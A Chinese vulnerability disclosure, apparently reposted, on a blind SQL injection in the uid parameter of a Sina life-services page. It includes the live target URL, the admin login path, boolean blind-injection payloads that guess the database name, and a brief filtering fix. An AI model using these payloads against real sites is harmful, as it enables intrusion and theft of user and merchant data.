新浪生活服务互动社区Mysql盲注漏洞的介绍及其修复方法(图解)

  • 时间:
  • 浏览:35
  • 来源:网络编程网
注入漏洞存在地址为
http://life.sina.com.cn/act/cgi/mother/md?uid=1464029310
其中该漏洞可以导致数据泄漏,其中泄漏的数据包括团购,优惠券、以及用户联系方式,smslog,团购商户、admin等数据。
 
同时,团购的商户登陆地址为
http://life.sina.com.cn/tuanadmin
 
漏洞证明:下面为手工猜解数据库名的语句为
http://life.sina.com.cn/act/cgi/mother/md?uid=1464029310 and Length((database()))<5
http://life.sina.com.cn/act/cgi/mother/md?uid=1464029310 and ascii(substring((database()),1,1))=108
http://life.sina.com.cn/act/cgi/mother/md?uid=1464029310 and ascii(substring((database()),1,1))=105
http://life.sina.com.cn/act/cgi/mother/md?uid=1464029310 and ascii(substring((database()),1,1))=102
http://life.sina.com.cn/act/cgi/mother/md?uid=1464029310 and ascii(substring((database()),1,1))=101
下图为注入是返回对正确与错误的截图
 
 
 
注入返回对的情况截图
 
 
 
注入时返回错的情况截图
 
一下是使用sqlmap对注入点进行注入攻击,一下该例为查询数据库banner,通过改变命令参数可以对其进行更深入的攻击。
 

 
修复方案:

对其uid参数进行检查并且进行过滤。
 
作者 Insight-labs

猜你喜欢

TypeScript 感谢

感谢创造和维护TypeScript的人们,给我们带来了如此优秀的工具感谢@zhongsp对官方手册的翻译,本书参考了大量他的翻译,能一直坚持跟进非常不容易感谢@阮一峰老师的EC

2018-06-29

TypeScript 代码检查

目前TypeScript的代码检查主要有两个方案:使用TSLint或使用ESLint+typescript-eslint-parser。什么是代码检查代码检查主要是用来发现代码

2018-06-29

TypeScript 工程

掌握了TypeScript的语法就像学会了砌墙的工艺。我们学习TypeScript的目的不是为了造一间小茅屋,而是为了造高楼大厦,这也正是TypeScript的类型系统带来的优

2018-06-29

TypeScript 扩展阅读

此处记录了官方手册(中文版)中包含,但是本书未涉及的概念。我认为它们是一些不重要或者不属于TypeScript的概念,所以这里只给出一个简单的释义,详细内容可以点击链接深入理解

2018-06-29

TypeScript 声明合并

如果定义了两个相同名字的函数、接口或类,那么它们会合并成一个类型:函数的合并之前学习过,我们可以使用重载定义多个函数类型:functionreverse(x:number):n

2018-06-29